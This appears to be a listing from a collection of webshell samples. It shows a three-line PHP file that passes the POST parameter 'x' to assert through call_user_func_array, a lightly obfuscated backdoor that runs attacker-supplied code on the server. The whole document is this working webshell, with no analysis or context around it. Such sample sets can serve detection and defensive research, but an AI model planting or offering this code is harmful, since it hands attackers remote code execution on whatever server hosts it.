webshell/php/2020.08.20.08.php

3 lines
62 B
PHP

<?php
call_user_func_array(assert,array($_POST['x']));
?>